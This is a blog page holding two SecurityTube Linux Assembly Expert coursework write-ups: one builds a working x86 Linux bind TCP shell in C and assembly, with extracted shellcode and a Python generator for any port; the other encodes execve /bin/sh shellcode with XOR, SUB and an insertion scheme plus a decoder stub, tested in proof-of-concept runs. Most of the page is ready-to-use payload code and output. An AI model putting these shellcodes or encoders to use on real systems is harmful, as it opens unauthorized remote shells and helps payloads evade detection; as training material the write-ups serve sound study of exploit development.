sábado, 25 de febrero de 2017

Assignment 1: Bind TCP Shell (SLAE)

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE-858


Exercise

  • Create a Shell_Bind_TCP shellcode
    • Binds to a port
    • Execs Shell on incoming connection
  •  Port number should be easily configurable

Solution

 First, we need to understand how the sockets work on linux. For this purpose I create a new program using a language where I am confortable, this socket receives an incoming connection and run a command using execve. The methods involved on it:

  • socket: Create an endpoint for communication and return a file descriptor  
  • bind: Bind a socket to a port
  • listen: Listen for connections on a socket
  • accept: Accept a connection on a socket
  • dup2: Duplicate the file descriptor, used for set stdin, stdout and sterr to the new file descritor (returned from accept)
  • execve: Execute a program (our purpose /bin/sh)

       
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>

int main(int argc, char *argv[]){

        // AF_INET = 2;         SOCK_STREAM = 1
        int fd = 0;
        int connfd = 0;
        fd = socket(AF_INET, SOCK_STREAM, 0);

        struct sockaddr_in serv_addr; 
        serv_addr.sin_family = AF_INET;
        serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
        serv_addr.sin_port = htons(4444); 

        bind(fd, (struct sockaddr*)&serv_addr, sizeof(serv_addr)); 
        listen(fd, 0);

        connfd = accept(fd, (struct sockaddr*)NULL, NULL);

        // redirect stdin, stdout, stderr
        dup2(connfd, 0);
        dup2(connfd, 1);
        dup2(connfd, 2); 

        // run program
        execve("/bin/sh", NULL, NULL);

}

We compile, run and test it to check if It is working...

Server:
       
hiro@HackingLab:~/SLAE/SLAE/EXAMEN/Assignment1$ gcc bind-shell-tcp.c -o bind-shell-tcp
hiro@HackingLab:~/SLAE/SLAE/EXAMEN/Assignment1$ ./bind-shell-tcp 

Client:
       
hiro@HackingLab:~/SLAE/SLAE/EXAMEN/Assignment1$ sudo netstat -lntp | grep 4444
tcp        0      0 0.0.0.0:4444            0.0.0.0:*               LISTEN      1229/bind-shell-tcp
hiro@HackingLab:~/SLAE/SLAE/EXAMEN/Assignment1$ nc -vv 127.0.0.1 4444
localhost [127.0.0.1] 4444 (?) open
id
uid=1000(hiro) gid=1000(hiro) groups=1000(hiro),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner)

After, I start to do same in assembly language. But before we need to know what are the numbers of the involved system calls.

Method System call Socket syscall Description
socket 0x66 (102) 1 (SYS_SOCKET) Create a socket
bind 0x66 (102) 2 (SYS_BIND) Bind a socket
listen 0x66 (102) 4 (SYS_LISTEN) Listen for connections
accept 0x66 (102) 5 (SYS_ACCEPT) Accept connections
dup2 0x3f (63) None Duplicate the file descriptors
execve 0xb (11) None Execute a program

System syscalls: /usr/include/i386-linux-gnu/asm/unistd_32.h
Socket syscalls: /usr/include/linux/net.h
Socket protocols: /usr/include/i386-linux-gnu/bits/socket.h
Socket domains: /usr/include/netinet/in.h
Socket types: /usr/include/i386-linux-gnu/bits/socket_type.h

Create a socket

       
int socket(int domain, int type, int protocol);


The domain will be IPv4 Internel Protocol, the type (of communication) SOCK_STREAM and the protocol. Basically, we push the parameters in the stack and save the stack pointer in the ecx register, after we run the system call.

       
        xor eax, eax
        xor ebx, ebx
        push eax                ; protocol      - 0
        push 1                  ; type          - SOCK_STREAM,
        push 2                  ; dominio       - AF_INET

        mov ecx, esp            ; arguments
        mov bl, 1               ; sys_socket (create)
        mov al, 102             ; systemcall
        int 0x80

        mov esi, eax            ; save sockfd


Bind a socket

       
int bind(int sockfd, const struct sockaddr *addr,
                socklen_t addrlen);

           struct sockaddr {
               sa_family_t sa_family;
               char        sa_data[14];
           }

    // IPv4 AF_INET sockets:

    struct sockaddr_in {
            short            sin_family; 
            unsigned short   sin_port;     
            struct in_addr   sin_addr;     
            char             sin_zero[8];  
    };

        struct sockaddr_in serv_addr;
        serv_addr.sin_family = AF_INET;
        serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
        serv_addr.sin_port = htons(4444);

I saved the created socket in the esi register, so i need to bind this socket. Firstly, I create the sockaddr variable and save it in the register ecx, secondly, I push in the stack the 3rd argument, thirdly, push ecx (the sockaddr variable) in the stack, it will be the second argument, finally, push the register esi in the stack, it is the file descriptor of the socket.
To create the sockaddr, we save in the stack the port, address and the address family. I save the stack pointer address in the ecx register. After, I push the address length, the sockaddr created before (ecx) and the file descriptor (esi). Finally, I move the stack pointer to ecx (arguments), mov to ebx the socket call for bind (2) and move the syscall for sockets to eax and execute the interrupt.

       
        xor eax, eax
        push eax                ; struct addr
        push word 0x5c11        ; Port 4444
        push word 2             ; PF_INET
        mov ecx, esp            ; save *addr in ecx

        push 0x10               ; length addrlen=16
        push ecx                ; &serv_addr
        push esi                ; sockfd

        mov ecx, esp            ; arguments
        mov al, 102             ; systemcall
        mov bl, 2               ; sys_bind
        int 0x80

 

Listen

       
int listen(int sockfd, int backlog);


The backlog is the maximum length that can be queue for pending connections for the file descriptor and sockfd is the socket file descriptor. I used 0 for the backlog and the socket file descriptor that it is saved in the esi register.

       
        xor eax, eax
        push eax                ; backlog
        push esi                ; sockfd

        mov ecx, esp            ; save arguments
        mov bl, 4               ; sys_listen
        mov al, 102             ; socket syscall
        int 0x80

 

Accept

       
int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);


In this case the second and the third argument are NULL, the first is the socket file descriptor saved in esi.

       
        xor eax, eax
        push eax                ; null
        push eax                ; null
        push esi                ; sockfd

        mov ecx, esp            ; save arguments
        mov bl, 5               ; sys_accept
        mov al, 102             ; socket syscall
        int 0x80


In this point, the program is waiting a new connection from the client.

 

Dup2

       
int dup2(int oldfd, int newfd);


Duplicate the file descriptor, I did a loop to duplicate the three file descriptors (in, out and err) with the socket file descriptor.

       
        mov ebx, eax            ; oldfd = clientfd
        xor ecx, ecx            ; ecx = newfd
loop:
        mov al, 0x3f            ; syscall dup2
        int 0x80
        inc ecx
        cmp ecx, 0x2
        jle loop

 

Execve

       
int execve(const char *filename, char *const argv[],
                  char *const envp[]);


Simple exevce shellcode /bin/sh that use the stack.

       
        xor eax, eax
        push eax
        push 0x68732f2f
        push 0x6e69622f
        mov ebx, esp
        push eax
        mov edx, esp
        push ebx
        mov ecx, esp
        mov al, 11
        int 0x80



Final program

       
global _start

section .text
_start:
        ; int socket(int domain, int type, int protocol);
        xor eax, eax
        xor ebx, ebx
        push eax                ; protocol      - 0
        push 1                  ; type          - SOCK_STREAM,
        push 2                  ; dominio       - AF_INET

        mov ecx, esp            ; arguments
        mov bl, 1               ; sys_socket
        mov al, 102             ; systemcall
        int 0x80

        mov esi, eax            ; save sockfd


        ; int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
        xor eax, eax
        xor ecx, ecx
        ; *addr
        push eax                ; addr
        push word 0x5c11        ; Port 4444
        push word 2             ; PF_INET
        mov ecx, esp            ; save *addr in ecx

        push 0x10               ; length addrlen=16
        push ecx                ; &serv_addr
        push esi                ; sockfd

        mov ecx, esp            ; arguments
        mov al, 102             ; systemcall
        mov bl, 2               ; sys_bind
        int 0x80

        ; int listen(int sockfd, int backlog);
        xor eax, eax
        push eax                ; backlog
        push esi                ; sockfd

        mov ecx, esp            ; save arguments
        mov bl, 4               ; sys_listen
        mov al, 102             ; socket syscall
        int 0x80

        ; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
        xor eax, eax
        push eax                ; null
        push eax                ; null
        push esi                ; sockfd

        mov ecx, esp            ; save arguments
        mov bl, 5               ; sys_accept 
        mov al, 102             ; socket syscall
        int 0x80

        ; int dup2(int oldfd, int newfd);
        mov ebx, eax            ; oldfd = clientfd
        xor ecx, ecx            ; ecx = newfd      
loop:
        mov al, 0x3f            ; syscall dup2    
        int 0x80
        inc ecx
        cmp ecx, 0x2
        jle loop


        ; execve stack-sh
        xor eax, eax
        push eax
        push 0x68732f2f
        push 0x6e69622f
        mov ebx, esp
        push eax
        mov edx, esp
        push ebx
        mov ecx, esp
        mov al, 11
        int 0x80

It works...
       
hiro@HackingLab:~/SLAE/SLAE/EXAMEN/Assignment1$ ./compile.sh bind-tcp
[+] Assembling with Nasm ... 
[+] Linking ...
[+] Done!
hiro@HackingLab:~/SLAE/SLAE/EXAMEN/Assignment1$ objdump -d ./bind-tcp|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x31\xc0\x31\xdb\x50\x6a\x01\x6a\x02\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc6\x31\xc0\x31\xc9\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x31\xc0\x50\x56\x89\xe1\xb3\x04\xb0\x66\xcd\x80\x31\xc0\x50\x50\x56\x89\xe1\xb3\x05\xb0\x66\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41\x83\xf9\x02\x7e\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
hiro@HackingLab:~/SLAE/SLAE/EXAMEN/Assignment1$ vim shellcode.c 
hiro@HackingLab:~/SLAE/SLAE/EXAMEN/Assignment1$ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
hiro@HackingLab:~/SLAE/SLAE/EXAMEN/Assignment1$ ./shellcode 
Shellcode Length:  109

       
hiro@HackingLab:~/SLAE/SLAE/EXAMEN/Assignment1$ sudo netstat -lnpt | grep 4444
tcp        0      0 0.0.0.0:4444            0.0.0.0:*               LISTEN      1334/shellcode  
hiro@HackingLab:~/SLAE/SLAE/EXAMEN/Assignment1$ nc -vv 127.0.0.1 4444
localhost [127.0.0.1] 4444 (?) open
id
uid=1000(hiro) gid=1000(hiro) groups=1000(hiro),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner)


Generate a bind TCP shellcode with configurable port

       
#!/usr/bin/env python

import sys
import struct
import os


def port2hex(port):
    return struct.pack(">H", port)


if __name__ == "__main__":
    if sys.argv[1] is not None:
        try:
            if (int(sys.argv[1])<1024):
                print "[?] Only root can open ports below 1024"

            port = port2hex(int(sys.argv[1]))
            port_check = [port.encode('hex')[i:i+2] for i in range(0, len(port.encode('hex')), 2)]
            nullbytes = False
            for i in port_check:
                if (i == "00"):
                    print "[-] The port contains null bytes, use another port"
                    nullbytes = True
            shellcode = "\x31\xc0\x31\xdb\x50\x6a\x01\x6a\x02\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc6\x31\xc0\x31\xc9\x50\x66\x68%s\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x31\xc0\x50\x56\x89\xe1\xb3\x04\xb0\x66\xcd\x80\x31\xc0\x50\x50\x56\x89\xe1\xb3\x05\xb0\x66\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41\x83\xf9\x02\x7e\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"%port
            sc = ""
            for c in bytearray(shellcode):
                    sc += "\\x%02x" % c
            shellcode_c = '#include\n\
#include\n\
unsigned char code[] = "%s";\n\
main(){\n\
printf("Shellcode Length: %%d\\n", strlen(code));\n\
int (*ret)() = (int(*)())code;\n\
ret();\n\
}'%sc
            with open("shellcode_tmp.c", "w") as f:
                f.write(shellcode_c)
            os.system("gcc shellcode_tmp.c -fno-stack-protector -z execstack -o shellcode")
            os.system("rm shellcode_tmp.c")
            if nullbytes:
                print "[+] Bind TCP shellcode created with null bytes\n[+] Run ./shellcode"
            else:
                print "[+] Bind TCP shellcode created\n[+] Run ./shellcode"
        except ValueError:
            print "[-] Port must be a number"
    else:
        print "usage: %prog  \nExample: ./%prog 4444"




Source code: https://github.com/Sinkmanu/SLAE/tree/master/Assignment1

viernes, 17 de febrero de 2017

Assignment 4: Insertion Encoder (SLAE)


This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE-858

Exercise 

  •  Create a custom encoding scheme like the "Insertion Encoder" we showed you
  • PoC with using execve-stack as the shellcode to encode with your schema and execute   

 

Solution 


The custom scheme is compose by a execve-stack (/bin/sh) encoded with XOR and SUB, after I added the "Insertion Encoder" using insertion that consists in an incremental counter.

So, the insertion decoder stub must decode it using the counter. First, I take a execve shellcode using the stack and encode it.

execve-stack (/bin/sh) without encoding:

       
global _start   

section .text
_start:
 xor eax, eax
 push eax
 push 0x68732f2f
 push 0x6e69622f
 mov ebx, esp
 push eax
 mov edx, esp
 push ebx
 mov ecx, esp
 mov al, 11
 int 0x80


I encoded the execve-stack shellcode using XOR and SUB operators to encode the shellcode.

Encoder execve-stack shellcode

       
#!/usr/bin/python

shellcode = ("\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")

encoded = ""
encoded2 = ""

for x in bytearray(shellcode) :
        y = x + 0x2
        c = y ^ 0xCA
        encoded += '\\x'
        encoded += '%02x' % c
        encoded2 += '0x'
        encoded2 += '%02x,' %c
        
print encoded
print encoded2
print 'Len: %d' % len(bytearray(shellcode))


I created the nasm program to decode it and generate the new shellcode:

Decoder execve-stack encoded shellcode

       
global _start   

section .text
_start:

 jmp short call_decoder

decoder:
 pop esi
 xor ecx, ecx
 mov cl,25
decode:
 xor byte[esi], 0xca
 sub byte[esi], 0x2
 inc esi
 loop decode
 jmp short Shellcode

call_decoder:
 call decoder
 Shellcode: db 0xf9,0x08,0x98,0xa0,0xba,0xfb,0xbf,0xa0,0xa0,0xfb,0xfb,0xae,0xa1,0x41,0x2f,0x98,0x41,0x2e,0x9f,0x41,0x29,0x78,0xc7,0x05,0x48


Getting the new shellcode:

       
hiro@HackingLab:~/SLAE/SLAE/EXAMEN/GitHub/SLAE/Assignment4$ ./compile.sh xor-sub-execve-stack
[+] Assembling with Nasm ... 
[+] Linking ...
[+] Done!
hiro@HackingLab:~/SLAE/SLAE/EXAMEN/GitHub/SLAE/Assignment4$ objdump -d ./xor-sub-execve-stack|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\xeb\x10\x5e\x31\xc9\xb1\x19\x80\x36\xca\x80\x2e\x02\x46\xe2\xf7\xeb\x05\xe8\xeb\xff\xff\xff\xf9\x08\x98\xa0\xba\xfb\xbf\xa0\xa0\xfb\xfb\xae\xa1\x41\x2f\x98\x41\x2e\x9f\x41\x29\x78\xc7\x05\x48"


Check if the shellcode works well... Finally, I added the custom encoded schema. 

Insertion encoder stub

       
#!/usr/bin/python

encoded = ""
encoded2 = ""

shellcode = ("\xeb\x10\x5e\x31\xc9\xb1\x19\x80\x36\xca\x80\x2e\x02\x46\xe2\xf7\xeb\x05\xe8\xeb\xff\xff\xff\xf9\x08\x98\xa0\xba\xfb\xbf\xa0\xa0\xfb\xfb\xae\xa1\x41\x2f\x98\x41\x2e\x9f\x41\x29\x78\xc7\x05\x48")

print 'Encoded shellcode ...'

counter = 1
for x in bytearray(shellcode) :
        encoded += '\\x'
        encoded += '%02x' % x
        encoded += '\\x%02x' % counter

        encoded2 += '0x'
        encoded2 += '%02x,' %x
        encoded2 += '0x%02x,' % counter
        counter += 1


print encoded
print encoded2

print 'Len: %d' % len(bytearray(shellcode))

       
hiro@HackingLab:~/SLAE/SLAE/EXAMEN/GitHub/SLAE/Assignment4$ ./Insertion-Encoder.py 
Encoded shellcode ...
\xeb\x01\x10\x02\x5e\x03\x31\x04\xc9\x05\xb1\x06\x19\x07\x80\x08\x36\x09\xca\x0a\x80\x0b\x2e\x0c\x02\x0d\x46\x0e\xe2\x0f\xf7\x10\xeb\x11\x05\x12\xe8\x13\xeb\x14\xff\x15\xff\x16\xff\x17\xf9\x18\x08\x19\x98\x1a\xa0\x1b\xba\x1c\xfb\x1d\xbf\x1e\xa0\x1f\xa0\x20\xfb\x21\xfb\x22\xae\x23\xa1\x24\x41\x25\x2f\x26\x98\x27\x41\x28\x2e\x29\x9f\x2a\x41\x2b\x29\x2c\x78\x2d\xc7\x2e\x05\x2f\x48\x30
0xeb,0x01,0x10,0x02,0x5e,0x03,0x31,0x04,0xc9,0x05,0xb1,0x06,0x19,0x07,0x80,0x08,0x36,0x09,0xca,0x0a,0x80,0x0b,0x2e,0x0c,0x02,0x0d,0x46,0x0e,0xe2,0x0f,0xf7,0x10,0xeb,0x11,0x05,0x12,0xe8,0x13,0xeb,0x14,0xff,0x15,0xff,0x16,0xff,0x17,0xf9,0x18,0x08,0x19,0x98,0x1a,0xa0,0x1b,0xba,0x1c,0xfb,0x1d,0xbf,0x1e,0xa0,0x1f,0xa0,0x20,0xfb,0x21,0xfb,0x22,0xae,0x23,0xa1,0x24,0x41,0x25,0x2f,0x26,0x98,0x27,0x41,0x28,0x2e,0x29,0x9f,0x2a,0x41,0x2b,0x29,0x2c,0x78,0x2d,0xc7,0x2e,0x05,0x2f,0x48,0x30,
Len: 48


Insertion decoder stub:

       
global _start   

section .text
_start:

 jmp short call_shellcode

decoder:
 pop esi
 lea edi, [esi +1]
 xor eax, eax
 mov al, 1
 xor ebx, ebx
 xor ecx, ecx
 mov cl, 1   ;counter

decode: 
 mov bl, byte [esi + eax]
 xor bl, cl
 jnz short EncodedShellcode
 mov bl, byte [esi + eax + 1]
 mov byte [edi], bl
 inc edi
 add al, 2
 add cl, 1
 jmp short decode 



call_shellcode:

 call decoder
 EncodedShellcode: db 0xeb,0x01,0x10,0x02,0x5e,0x03,0x31,0x04,0xc9,0x05,0xb1,0x06,0x19,0x07,0x80,0x08,0x36,0x09,0xca,0x0a,0x80,0x0b,0x2e,0x0c,0x02,0x0d,0x46,0x0e,0xe2,0x0f,0xf7,0x10,0xeb,0x11,0x05,0x12,0xe8,0x13,0xeb,0x14,0xff,0x15,0xff,0x16,0xff,0x17,0xf9,0x18,0x08,0x19,0x98,0x1a,0xa0,0x1b,0xba,0x1c,0xfb,0x1d,0xbf,0x1e,0xa0,0x1f,0xa0,0x20,0xfb,0x21,0xfb,0x22,0xae,0x23,0xa1,0x24,0x41,0x25,0x2f,0x26,0x98,0x27,0x41,0x28,0x2e,0x29,0x9f,0x2a,0x41,0x2b,0x29,0x2c,0x78,0x2d,0xc7,0x2e,0x05,0x2f,0x48,0x30

       
hiro@HackingLab:~/SLAE/SLAE/EXAMEN/GitHub/SLAE/Assignment4$ objdump -d ./insertion-decoder|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\xeb\x23\x5e\x8d\x7e\x01\x31\xc0\xb0\x01\x31\xdb\x31\xc9\xb1\x01\x8a\x1c\x06\x30\xcb\x75\x13\x8a\x5c\x06\x01\x88\x1f\x47\x04\x02\x80\xc1\x01\xeb\xeb\xe8\xd8\xff\xff\xff\xeb\x01\x10\x02\x5e\x03\x31\x04\xc9\x05\xb1\x06\x19\x07\x80\x08\x36\x09\xca\x0a\x80\x0b\x2e\x0c\x02\x0d\x46\x0e\xe2\x0f\xf7\x10\xeb\x11\x05\x12\xe8\x13\xeb\x14\xff\x15\xff\x16\xff\x17\xf9\x18\x08\x19\x98\x1a\xa0\x1b\xba\x1c\xfb\x1d\xbf\x1e\xa0\x1f\xa0\x20\xfb\x21\xfb\x22\xae\x23\xa1\x24\x41\x25\x2f\x26\x98\x27\x41\x28\x2e\x29\x9f\x2a\x41\x2b\x29\x2c\x78\x2d\xc7\x2e\x05\x2f\x48\x30"


And we check that the shellcode works well...

Proof of Concept (PoC)

       
hiro@HackingLab:~/SLAE/SLAE/EXAMEN/GitHub/SLAE/Assignment4$ cat shellcode.c 
#include
#include

unsigned char code[] = 
"\xeb\x23\x5e\x8d\x7e\x01\x31\xc0\xb0\x01\x31\xdb\x31\xc9\xb1\x01\x8a\x1c\x06\x30\xcb\x75\x13\x8a\x5c\x06\x01\x88\x1f\x47\x04\x02\x80\xc1\x01\xeb\xeb\xe8\xd8\xff\xff\xff\xeb\x01\x10\x02\x5e\x03\x31\x04\xc9\x05\xb1\x06\x19\x07\x80\x08\x36\x09\xca\x0a\x80\x0b\x2e\x0c\x02\x0d\x46\x0e\xe2\x0f\xf7\x10\xeb\x11\x05\x12\xe8\x13\xeb\x14\xff\x15\xff\x16\xff\x17\xf9\x18\x08\x19\x98\x1a\xa0\x1b\xba\x1c\xfb\x1d\xbf\x1e\xa0\x1f\xa0\x20\xfb\x21\xfb\x22\xae\x23\xa1\x24\x41\x25\x2f\x26\x98\x27\x41\x28\x2e\x29\x9f\x2a\x41\x2b\x29\x2c\x78\x2d\xc7\x2e\x05\x2f\x48\x30";

main()
{

 printf("Shellcode Length:  %d\n", strlen(code));

 int (*ret)() = (int(*)())code;

 ret();

}
hiro@HackingLab:~/SLAE/SLAE/EXAMEN/GitHub/SLAE/Assignment4$ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
hiro@HackingLab:~/SLAE/SLAE/EXAMEN/GitHub/SLAE/Assignment4$ ./shellcode 
Shellcode Length:  138
$ id
uid=1000(hiro) gid=1000(hiro) groups=1000(hiro),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner)
$ 
       


Source code:
https://github.com/Sinkmanu/SLAE/tree/master/Assignment4